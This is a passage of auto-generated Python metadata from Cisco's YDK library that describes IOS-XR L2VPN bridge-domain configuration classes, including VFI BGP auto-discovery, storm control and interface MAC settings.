'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
False,
[
_MetaInfoClassMember('route-target', REFERENCE_LIST, 'RouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
[], [],
''' Name of the Route Target
''',
'route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
False,
[
_MetaInfoClassMember('ad-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable control-word for this VFI
''',
'ad_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-route-policy', REFERENCE_CLASS, 'BgpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
[], [],
''' Route policy
''',
'bgp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bgp-signaling-protocol', REFERENCE_CLASS, 'BgpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
[], [],
''' Enable Signaling Protocol BGP in this
VFI
''',
'bgp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ldp-signaling-protocol', REFERENCE_CLASS, 'LdpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
[], [],
''' Signaling Protocol LDP in this VFI
configuration
''',
'ldp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-targets', REFERENCE_CLASS, 'RouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
[], [],
''' Route Target
''',
'route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of
forwarding data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Virtual Forwarding Interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bgp-auto-discovery', REFERENCE_CLASS, 'BgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in this VFI
''',
'bgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multicast-p2mp', REFERENCE_CLASS, 'MulticastP2Mp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
[], [],
''' Enable Multicast P2MP in this VFI
''',
'multicast_p2mp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pseudowires', REFERENCE_CLASS, 'VfiPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
[], [],
''' List of pseudowires
''',
'vfi_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling Shutdown
''',
'vfi_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vpnid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'vpnid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
False,
[
_MetaInfoClassMember('vfi', REFERENCE_LIST, 'Vfi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
[], [],
''' Name of the Virtual Forwarding Interface
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic IP source
guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic ARP
Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2 Interface Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai-address-validation', REFERENCE_CLASS, 'InterfaceDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
[], [],
''' Address Validation
''',
'interface_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
False,
[
_MetaInfoClassMember('bdac-storm-control-type', REFERENCE_LIST, 'BdacStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
[], [],
''' Storm Control Type
''',
'bdac_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon-group-id',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
False,
[
_MetaInfoClassMember('split-horizon-group-id', REFERENCE_CLASS, 'SplitHorizonGroupId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
[], [],
''' Split Horizon Group ID
''',
'split_horizon_group_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
False,
[
_MetaInfoClassMember('static-mac-address', REFERENCE_LIST, 'StaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
False,
[
_MetaInfoClassMember('interface-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'interface_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'interface_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
False,
[
_MetaInfoClassMember('interface-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Interface MAC address limit enforcement
action
''',
'interface_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on an Interface
after which MAC limit action is taken
''',
'interface_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Interface
''',
'interface_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
False,
[
_MetaInfoClassMember('interface-mac-aging', REFERENCE_CLASS, 'InterfaceMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'interface_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'interface_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit', REFERENCE_CLASS, 'InterfaceMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'interface_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'interface_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
